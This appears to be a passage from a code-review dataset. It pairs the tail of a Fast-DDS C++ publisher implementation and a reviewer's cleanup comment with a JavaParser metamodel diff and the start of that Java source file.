lit1 != this->m_att.multicastLocatorList.end(); ++lit1)
{
missing = true;
for (LocatorListConstIterator lit2 = att.multicastLocatorList.begin();
lit2 != att.multicastLocatorList.end(); ++lit2)
{
if (*lit1 == *lit2)
{
missing = false;
break;
}
}
if (missing)
{
logWarning(PUBLISHER, "Locator: " << *lit1 << " not present in new list");
logWarning(PUBLISHER, "Locator Lists cannot be changed or updated in this version");
}
}
}
}
//TOPIC ATTRIBUTES
if (this->m_att.topic != att.topic)
{
logWarning(PUBLISHER, "Topic Attributes cannot be updated");
updated &= false;
}
//QOS:
//CHECK IF THE QOS CAN BE SET
if (!this->m_att.qos.canQosBeUpdated(att.qos))
{
updated &= false;
}
if (updated)
{
if (this->m_att.qos.m_reliability.kind == RELIABLE_RELIABILITY_QOS)
{
//UPDATE TIMES:
StatefulWriter* sfw = (StatefulWriter*)mp_writer;
sfw->updateTimes(att.times);
}
this->m_att.qos.setQos(att.qos, false);
this->m_att = att;
//Notify the participant that a Writer has changed its QOS
mp_rtpsParticipant->updateWriter(this->mp_writer, m_att.topic, m_att.qos);
// Deadline
if (m_att.qos.m_deadline.period != c_TimeInfinite)
{
deadline_duration_us_ =
duration<double, std::ratio<1, 1000000> >(m_att.qos.m_deadline.period.to_ns() * 1e-3);
deadline_timer_->update_interval_millisec(m_att.qos.m_deadline.period.to_ns() * 1e-6);
}
else
{
deadline_timer_->cancel_timer();
}
// Lifespan
if (m_att.qos.m_lifespan.duration != c_TimeInfinite)
{
lifespan_duration_us_ =
duration<double, std::ratio<1, 1000000> >(m_att.qos.m_lifespan.duration.to_ns() * 1e-3);
lifespan_timer_->update_interval_millisec(m_att.qos.m_lifespan.duration.to_ns() * 1e-6);
}
else
{
lifespan_timer_->cancel_timer();
}
}
return updated;
}
void PublisherImpl::PublisherWriterListener::onWriterMatched(
RTPSWriter* /*writer*/,
MatchingInfo& info)
{
if ( mp_publisherImpl->mp_listener != nullptr )
{
mp_publisherImpl->mp_listener->onPublicationMatched(mp_publisherImpl->mp_userPublisher, info);
}
}
void PublisherImpl::PublisherWriterListener::onWriterChangeReceivedByAll(
RTPSWriter* /*writer*/,
CacheChange_t* ch)
{
if (mp_publisherImpl->m_att.qos.m_durability.kind == VOLATILE_DURABILITY_QOS)
{
mp_publisherImpl->m_history.remove_change_g(ch);
}
}
void PublisherImpl::PublisherWriterListener::on_liveliness_lost(
RTPSWriter* writer,
const LivelinessLostStatus& status)
{
(void)writer;
if (mp_publisherImpl->mp_listener != nullptr)
{
mp_publisherImpl->mp_listener->on_liveliness_lost(
mp_publisherImpl->mp_userPublisher,
status);
}
}
bool PublisherImpl::wait_for_all_acked(
const eprosima::fastrtps::Duration_t& max_wait)
{
return mp_writer->wait_for_all_acked(max_wait);
}
bool PublisherImpl::deadline_timer_reschedule()
{
assert(m_att.qos.m_deadline.period != c_TimeInfinite);
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
steady_clock::time_point next_deadline_us;
if (!m_history.get_next_deadline(timer_owner_, next_deadline_us))
{
logError(PUBLISHER, "Could not get the next deadline from the history");
return false;
}
auto interval_ms = duration_cast<milliseconds>(next_deadline_us - steady_clock::now());
deadline_timer_->update_interval_millisec((double)interval_ms.count());
return true;
}
bool PublisherImpl::deadline_missed()
{
assert(m_att.qos.m_deadline.period != c_TimeInfinite);
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
deadline_missed_status_.total_count++;
deadline_missed_status_.total_count_change++;
deadline_missed_status_.last_instance_handle = timer_owner_;
mp_listener->on_offered_deadline_missed(mp_userPublisher, deadline_missed_status_);
deadline_missed_status_.total_count_change = 0;
if (!m_history.set_next_deadline(
timer_owner_,
steady_clock::now() + duration_cast<system_clock::duration>(deadline_duration_us_)))
{
logError(PUBLISHER, "Could not set the next deadline in the history");
return false;
}
return deadline_timer_reschedule();
}
void PublisherImpl::get_offered_deadline_missed_status(
OfferedDeadlineMissedStatus& status)
{
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
status = deadline_missed_status_;
deadline_missed_status_.total_count_change = 0;
}
bool PublisherImpl::lifespan_expired()
{
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
CacheChange_t* earliest_change;
if (!m_history.get_earliest_change(&earliest_change))
{
return false;
}
auto source_timestamp = system_clock::time_point() + nanoseconds(earliest_change->sourceTimestamp.to_ns());
auto now = system_clock::now();
// Check that the earliest change has expired (the change which started the timer could have been removed from the history)
if (now - source_timestamp < lifespan_duration_us_)
{
auto interval = source_timestamp - now + lifespan_duration_us_;
lifespan_timer_->update_interval_millisec((double)duration_cast<milliseconds>(interval).count());
return true;
}
// The earliest change has expired
m_history.remove_change_pub(earliest_change);
// Set the timer for the next change if there is one
if (!m_history.get_earliest_change(&earliest_change))
{
return false;
}
// Calculate when the next change is due to expire and restart
source_timestamp = system_clock::time_point() + nanoseconds(earliest_change->sourceTimestamp.to_ns());
now = system_clock::now();
auto interval = source_timestamp - now + lifespan_duration_us_;
assert(interval.count() > 0);
lifespan_timer_->update_interval_millisec((double)duration_cast<milliseconds>(interval).count());
return true;
}
void PublisherImpl::get_liveliness_lost_status(
LivelinessLostStatus& status)
{
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
status = mp_writer->liveliness_lost_status_;
mp_writer->liveliness_lost_status_.total_count_change = 0u;
}
void PublisherImpl::assert_liveliness()
{
if (!mp_rtpsParticipant->wlp()->assert_liveliness(
mp_writer->getGuid(),
mp_writer->get_liveliness_kind(),
mp_writer->get_liveliness_lease_duration()))
{
logError(PUBLISHER, "Could not assert liveliness of writer " << mp_writer->getGuid());
}
if (m_att.qos.m_liveliness.kind == MANUAL_BY_TOPIC_LIVELINESS_QOS)
{
// As described in the RTPS specification, if liveliness kind is manual a heartbeat must be sent
// This only applies to stateful writers, as stateless writers do not send heartbeats
StatefulWriter* stateful_writer = dynamic_cast<StatefulWriter*>(mp_writer);
if (stateful_writer != nullptr)
{
stateful_writer->send_periodic_heartbeat(true, true);
}
}
}
| 1 | 17,319 | Another cleanup. There are two additional `using namespace std::chrono;` under this one. Should also remove std::chrono:: from the full file. Please do this on a single commit. | eProsima-Fast-DDS | cpp |
@@ -501,7 +501,7 @@ public final class JavaParserMetaModel {
enclosedExprMetaModel.getDeclaredPropertyMetaModels().add(enclosedExprMetaModel.innerPropertyMetaModel);
fieldAccessExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.namePropertyMetaModel);
- fieldAccessExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
+ fieldAccessExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.scopePropertyMetaModel);
fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel); | 1 | package com.github.javaparser.metamodel;
import com.github.javaparser.ast.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
/**
* The model contains meta-data about all nodes in the AST.
*/
public final class JavaParserMetaModel {
private JavaParserMetaModel() {
}
private static final List<BaseNodeMetaModel> nodeMetaModels = new ArrayList<>();
private static void initializeConstructorParameters() {
bodyDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.modifiersPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.typeParametersPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.namePropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.parametersPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel);
typeMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
annotationExprMetaModel.getConstructorParameters().add(annotationExprMetaModel.namePropertyMetaModel);
typeDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
typeDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
typeDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.namePropertyMetaModel);
typeDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.membersPropertyMetaModel);
referenceTypeMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
literalStringValueExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
stringLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
moduleDeclarationMetaModel.getConstructorParameters().add(moduleDeclarationMetaModel.annotationsPropertyMetaModel);
moduleDeclarationMetaModel.getConstructorParameters().add(moduleDeclarationMetaModel.namePropertyMetaModel);
moduleDeclarationMetaModel.getConstructorParameters().add(moduleDeclarationMetaModel.isOpenPropertyMetaModel);
moduleDeclarationMetaModel.getConstructorParameters().add(moduleDeclarationMetaModel.moduleStmtsPropertyMetaModel);
arrayCreationLevelMetaModel.getConstructorParameters().add(arrayCreationLevelMetaModel.dimensionPropertyMetaModel);
arrayCreationLevelMetaModel.getConstructorParameters().add(arrayCreationLevelMetaModel.annotationsPropertyMetaModel);
compilationUnitMetaModel.getConstructorParameters().add(compilationUnitMetaModel.packageDeclarationPropertyMetaModel);
compilationUnitMetaModel.getConstructorParameters().add(compilationUnitMetaModel.importsPropertyMetaModel);
compilationUnitMetaModel.getConstructorParameters().add(compilationUnitMetaModel.typesPropertyMetaModel);
compilationUnitMetaModel.getConstructorParameters().add(compilationUnitMetaModel.modulePropertyMetaModel);
packageDeclarationMetaModel.getConstructorParameters().add(packageDeclarationMetaModel.annotationsPropertyMetaModel);
packageDeclarationMetaModel.getConstructorParameters().add(packageDeclarationMetaModel.namePropertyMetaModel);
annotationDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
annotationDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
annotationDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.namePropertyMetaModel);
annotationDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.membersPropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(annotationMemberDeclarationMetaModel.modifiersPropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(annotationMemberDeclarationMetaModel.typePropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(annotationMemberDeclarationMetaModel.namePropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(annotationMemberDeclarationMetaModel.defaultValuePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(classOrInterfaceDeclarationMetaModel.isInterfacePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.namePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(classOrInterfaceDeclarationMetaModel.typeParametersPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(classOrInterfaceDeclarationMetaModel.extendedTypesPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(classOrInterfaceDeclarationMetaModel.implementedTypesPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.membersPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.modifiersPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.typeParametersPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.namePropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.parametersPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(constructorDeclarationMetaModel.bodyPropertyMetaModel);
enumConstantDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
enumConstantDeclarationMetaModel.getConstructorParameters().add(enumConstantDeclarationMetaModel.namePropertyMetaModel);
enumConstantDeclarationMetaModel.getConstructorParameters().add(enumConstantDeclarationMetaModel.argumentsPropertyMetaModel);
enumConstantDeclarationMetaModel.getConstructorParameters().add(enumConstantDeclarationMetaModel.classBodyPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.namePropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(enumDeclarationMetaModel.implementedTypesPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(enumDeclarationMetaModel.entriesPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.membersPropertyMetaModel);
fieldDeclarationMetaModel.getConstructorParameters().add(fieldDeclarationMetaModel.modifiersPropertyMetaModel);
fieldDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
fieldDeclarationMetaModel.getConstructorParameters().add(fieldDeclarationMetaModel.variablesPropertyMetaModel);
initializerDeclarationMetaModel.getConstructorParameters().add(initializerDeclarationMetaModel.isStaticPropertyMetaModel);
initializerDeclarationMetaModel.getConstructorParameters().add(initializerDeclarationMetaModel.bodyPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.modifiersPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.typeParametersPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(methodDeclarationMetaModel.typePropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.namePropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.parametersPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(methodDeclarationMetaModel.bodyPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.modifiersPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.annotationsPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.typePropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.isVarArgsPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.varArgsAnnotationsPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.namePropertyMetaModel);
variableDeclaratorMetaModel.getConstructorParameters().add(variableDeclaratorMetaModel.typePropertyMetaModel);
variableDeclaratorMetaModel.getConstructorParameters().add(variableDeclaratorMetaModel.namePropertyMetaModel);
variableDeclaratorMetaModel.getConstructorParameters().add(variableDeclaratorMetaModel.initializerPropertyMetaModel);
commentMetaModel.getConstructorParameters().add(commentMetaModel.contentPropertyMetaModel);
blockCommentMetaModel.getConstructorParameters().add(commentMetaModel.contentPropertyMetaModel);
javadocCommentMetaModel.getConstructorParameters().add(commentMetaModel.contentPropertyMetaModel);
lineCommentMetaModel.getConstructorParameters().add(commentMetaModel.contentPropertyMetaModel);
arrayAccessExprMetaModel.getConstructorParameters().add(arrayAccessExprMetaModel.namePropertyMetaModel);
arrayAccessExprMetaModel.getConstructorParameters().add(arrayAccessExprMetaModel.indexPropertyMetaModel);
arrayCreationExprMetaModel.getConstructorParameters().add(arrayCreationExprMetaModel.elementTypePropertyMetaModel);
arrayCreationExprMetaModel.getConstructorParameters().add(arrayCreationExprMetaModel.levelsPropertyMetaModel);
arrayCreationExprMetaModel.getConstructorParameters().add(arrayCreationExprMetaModel.initializerPropertyMetaModel);
arrayInitializerExprMetaModel.getConstructorParameters().add(arrayInitializerExprMetaModel.valuesPropertyMetaModel);
assignExprMetaModel.getConstructorParameters().add(assignExprMetaModel.targetPropertyMetaModel);
assignExprMetaModel.getConstructorParameters().add(assignExprMetaModel.valuePropertyMetaModel);
assignExprMetaModel.getConstructorParameters().add(assignExprMetaModel.operatorPropertyMetaModel);
binaryExprMetaModel.getConstructorParameters().add(binaryExprMetaModel.leftPropertyMetaModel);
binaryExprMetaModel.getConstructorParameters().add(binaryExprMetaModel.rightPropertyMetaModel);
binaryExprMetaModel.getConstructorParameters().add(binaryExprMetaModel.operatorPropertyMetaModel);
booleanLiteralExprMetaModel.getConstructorParameters().add(booleanLiteralExprMetaModel.valuePropertyMetaModel);
castExprMetaModel.getConstructorParameters().add(castExprMetaModel.typePropertyMetaModel);
castExprMetaModel.getConstructorParameters().add(castExprMetaModel.expressionPropertyMetaModel);
charLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
classExprMetaModel.getConstructorParameters().add(classExprMetaModel.typePropertyMetaModel);
conditionalExprMetaModel.getConstructorParameters().add(conditionalExprMetaModel.conditionPropertyMetaModel);
conditionalExprMetaModel.getConstructorParameters().add(conditionalExprMetaModel.thenExprPropertyMetaModel);
conditionalExprMetaModel.getConstructorParameters().add(conditionalExprMetaModel.elseExprPropertyMetaModel);
doubleLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
enclosedExprMetaModel.getConstructorParameters().add(enclosedExprMetaModel.innerPropertyMetaModel);
fieldAccessExprMetaModel.getConstructorParameters().add(fieldAccessExprMetaModel.scopePropertyMetaModel);
fieldAccessExprMetaModel.getConstructorParameters().add(fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel);
fieldAccessExprMetaModel.getConstructorParameters().add(fieldAccessExprMetaModel.namePropertyMetaModel);
instanceOfExprMetaModel.getConstructorParameters().add(instanceOfExprMetaModel.expressionPropertyMetaModel);
instanceOfExprMetaModel.getConstructorParameters().add(instanceOfExprMetaModel.typePropertyMetaModel);
integerLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
lambdaExprMetaModel.getConstructorParameters().add(lambdaExprMetaModel.parametersPropertyMetaModel);
lambdaExprMetaModel.getConstructorParameters().add(lambdaExprMetaModel.bodyPropertyMetaModel);
lambdaExprMetaModel.getConstructorParameters().add(lambdaExprMetaModel.isEnclosingParametersPropertyMetaModel);
longLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
markerAnnotationExprMetaModel.getConstructorParameters().add(annotationExprMetaModel.namePropertyMetaModel);
memberValuePairMetaModel.getConstructorParameters().add(memberValuePairMetaModel.namePropertyMetaModel);
memberValuePairMetaModel.getConstructorParameters().add(memberValuePairMetaModel.valuePropertyMetaModel);
methodCallExprMetaModel.getConstructorParameters().add(methodCallExprMetaModel.scopePropertyMetaModel);
methodCallExprMetaModel.getConstructorParameters().add(methodCallExprMetaModel.typeArgumentsPropertyMetaModel);
methodCallExprMetaModel.getConstructorParameters().add(methodCallExprMetaModel.namePropertyMetaModel);
methodCallExprMetaModel.getConstructorParameters().add(methodCallExprMetaModel.argumentsPropertyMetaModel);
methodReferenceExprMetaModel.getConstructorParameters().add(methodReferenceExprMetaModel.scopePropertyMetaModel);
methodReferenceExprMetaModel.getConstructorParameters().add(methodReferenceExprMetaModel.typeArgumentsPropertyMetaModel);
methodReferenceExprMetaModel.getConstructorParameters().add(methodReferenceExprMetaModel.identifierPropertyMetaModel);
nameExprMetaModel.getConstructorParameters().add(nameExprMetaModel.namePropertyMetaModel);
nameMetaModel.getConstructorParameters().add(nameMetaModel.qualifierPropertyMetaModel);
nameMetaModel.getConstructorParameters().add(nameMetaModel.identifierPropertyMetaModel);
nameMetaModel.getConstructorParameters().add(nameMetaModel.annotationsPropertyMetaModel);
normalAnnotationExprMetaModel.getConstructorParameters().add(annotationExprMetaModel.namePropertyMetaModel);
normalAnnotationExprMetaModel.getConstructorParameters().add(normalAnnotationExprMetaModel.pairsPropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.scopePropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.typePropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.typeArgumentsPropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.argumentsPropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.anonymousClassBodyPropertyMetaModel);
simpleNameMetaModel.getConstructorParameters().add(simpleNameMetaModel.identifierPropertyMetaModel);
singleMemberAnnotationExprMetaModel.getConstructorParameters().add(annotationExprMetaModel.namePropertyMetaModel);
singleMemberAnnotationExprMetaModel.getConstructorParameters().add(singleMemberAnnotationExprMetaModel.memberValuePropertyMetaModel);
superExprMetaModel.getConstructorParameters().add(superExprMetaModel.classExprPropertyMetaModel);
thisExprMetaModel.getConstructorParameters().add(thisExprMetaModel.classExprPropertyMetaModel);
typeExprMetaModel.getConstructorParameters().add(typeExprMetaModel.typePropertyMetaModel);
unaryExprMetaModel.getConstructorParameters().add(unaryExprMetaModel.expressionPropertyMetaModel);
unaryExprMetaModel.getConstructorParameters().add(unaryExprMetaModel.operatorPropertyMetaModel);
variableDeclarationExprMetaModel.getConstructorParameters().add(variableDeclarationExprMetaModel.modifiersPropertyMetaModel);
variableDeclarationExprMetaModel.getConstructorParameters().add(variableDeclarationExprMetaModel.annotationsPropertyMetaModel);
variableDeclarationExprMetaModel.getConstructorParameters().add(variableDeclarationExprMetaModel.variablesPropertyMetaModel);
importDeclarationMetaModel.getConstructorParameters().add(importDeclarationMetaModel.namePropertyMetaModel);
importDeclarationMetaModel.getConstructorParameters().add(importDeclarationMetaModel.isStaticPropertyMetaModel);
importDeclarationMetaModel.getConstructorParameters().add(importDeclarationMetaModel.isAsteriskPropertyMetaModel);
assertStmtMetaModel.getConstructorParameters().add(assertStmtMetaModel.checkPropertyMetaModel);
assertStmtMetaModel.getConstructorParameters().add(assertStmtMetaModel.messagePropertyMetaModel);
blockStmtMetaModel.getConstructorParameters().add(blockStmtMetaModel.statementsPropertyMetaModel);
breakStmtMetaModel.getConstructorParameters().add(breakStmtMetaModel.labelPropertyMetaModel);
catchClauseMetaModel.getConstructorParameters().add(catchClauseMetaModel.parameterPropertyMetaModel);
catchClauseMetaModel.getConstructorParameters().add(catchClauseMetaModel.bodyPropertyMetaModel);
continueStmtMetaModel.getConstructorParameters().add(continueStmtMetaModel.labelPropertyMetaModel);
doStmtMetaModel.getConstructorParameters().add(doStmtMetaModel.bodyPropertyMetaModel);
doStmtMetaModel.getConstructorParameters().add(doStmtMetaModel.conditionPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.getConstructorParameters().add(explicitConstructorInvocationStmtMetaModel.typeArgumentsPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.getConstructorParameters().add(explicitConstructorInvocationStmtMetaModel.isThisPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.getConstructorParameters().add(explicitConstructorInvocationStmtMetaModel.expressionPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.getConstructorParameters().add(explicitConstructorInvocationStmtMetaModel.argumentsPropertyMetaModel);
expressionStmtMetaModel.getConstructorParameters().add(expressionStmtMetaModel.expressionPropertyMetaModel);
foreachStmtMetaModel.getConstructorParameters().add(foreachStmtMetaModel.variablePropertyMetaModel);
foreachStmtMetaModel.getConstructorParameters().add(foreachStmtMetaModel.iterablePropertyMetaModel);
foreachStmtMetaModel.getConstructorParameters().add(foreachStmtMetaModel.bodyPropertyMetaModel);
forStmtMetaModel.getConstructorParameters().add(forStmtMetaModel.initializationPropertyMetaModel);
forStmtMetaModel.getConstructorParameters().add(forStmtMetaModel.comparePropertyMetaModel);
forStmtMetaModel.getConstructorParameters().add(forStmtMetaModel.updatePropertyMetaModel);
forStmtMetaModel.getConstructorParameters().add(forStmtMetaModel.bodyPropertyMetaModel);
ifStmtMetaModel.getConstructorParameters().add(ifStmtMetaModel.conditionPropertyMetaModel);
ifStmtMetaModel.getConstructorParameters().add(ifStmtMetaModel.thenStmtPropertyMetaModel);
ifStmtMetaModel.getConstructorParameters().add(ifStmtMetaModel.elseStmtPropertyMetaModel);
labeledStmtMetaModel.getConstructorParameters().add(labeledStmtMetaModel.labelPropertyMetaModel);
labeledStmtMetaModel.getConstructorParameters().add(labeledStmtMetaModel.statementPropertyMetaModel);
returnStmtMetaModel.getConstructorParameters().add(returnStmtMetaModel.expressionPropertyMetaModel);
switchEntryStmtMetaModel.getConstructorParameters().add(switchEntryStmtMetaModel.labelPropertyMetaModel);
switchEntryStmtMetaModel.getConstructorParameters().add(switchEntryStmtMetaModel.statementsPropertyMetaModel);
switchStmtMetaModel.getConstructorParameters().add(switchStmtMetaModel.selectorPropertyMetaModel);
switchStmtMetaModel.getConstructorParameters().add(switchStmtMetaModel.entriesPropertyMetaModel);
synchronizedStmtMetaModel.getConstructorParameters().add(synchronizedStmtMetaModel.expressionPropertyMetaModel);
synchronizedStmtMetaModel.getConstructorParameters().add(synchronizedStmtMetaModel.bodyPropertyMetaModel);
throwStmtMetaModel.getConstructorParameters().add(throwStmtMetaModel.expressionPropertyMetaModel);
tryStmtMetaModel.getConstructorParameters().add(tryStmtMetaModel.resourcesPropertyMetaModel);
tryStmtMetaModel.getConstructorParameters().add(tryStmtMetaModel.tryBlockPropertyMetaModel);
tryStmtMetaModel.getConstructorParameters().add(tryStmtMetaModel.catchClausesPropertyMetaModel);
tryStmtMetaModel.getConstructorParameters().add(tryStmtMetaModel.finallyBlockPropertyMetaModel);
localClassDeclarationStmtMetaModel.getConstructorParameters().add(localClassDeclarationStmtMetaModel.classDeclarationPropertyMetaModel);
whileStmtMetaModel.getConstructorParameters().add(whileStmtMetaModel.conditionPropertyMetaModel);
whileStmtMetaModel.getConstructorParameters().add(whileStmtMetaModel.bodyPropertyMetaModel);
arrayTypeMetaModel.getConstructorParameters().add(arrayTypeMetaModel.componentTypePropertyMetaModel);
arrayTypeMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
classOrInterfaceTypeMetaModel.getConstructorParameters().add(classOrInterfaceTypeMetaModel.scopePropertyMetaModel);
classOrInterfaceTypeMetaModel.getConstructorParameters().add(classOrInterfaceTypeMetaModel.namePropertyMetaModel);
classOrInterfaceTypeMetaModel.getConstructorParameters().add(classOrInterfaceTypeMetaModel.typeArgumentsPropertyMetaModel);
classOrInterfaceTypeMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
intersectionTypeMetaModel.getConstructorParameters().add(intersectionTypeMetaModel.elementsPropertyMetaModel);
primitiveTypeMetaModel.getConstructorParameters().add(primitiveTypeMetaModel.typePropertyMetaModel);
typeParameterMetaModel.getConstructorParameters().add(typeParameterMetaModel.namePropertyMetaModel);
typeParameterMetaModel.getConstructorParameters().add(typeParameterMetaModel.typeBoundPropertyMetaModel);
typeParameterMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
unionTypeMetaModel.getConstructorParameters().add(unionTypeMetaModel.elementsPropertyMetaModel);
wildcardTypeMetaModel.getConstructorParameters().add(wildcardTypeMetaModel.extendedTypePropertyMetaModel);
wildcardTypeMetaModel.getConstructorParameters().add(wildcardTypeMetaModel.superTypePropertyMetaModel);
moduleRequiresStmtMetaModel.getConstructorParameters().add(moduleRequiresStmtMetaModel.modifiersPropertyMetaModel);
moduleRequiresStmtMetaModel.getConstructorParameters().add(moduleRequiresStmtMetaModel.namePropertyMetaModel);
moduleExportsStmtMetaModel.getConstructorParameters().add(moduleExportsStmtMetaModel.namePropertyMetaModel);
moduleExportsStmtMetaModel.getConstructorParameters().add(moduleExportsStmtMetaModel.moduleNamesPropertyMetaModel);
moduleProvidesStmtMetaModel.getConstructorParameters().add(moduleProvidesStmtMetaModel.typePropertyMetaModel);
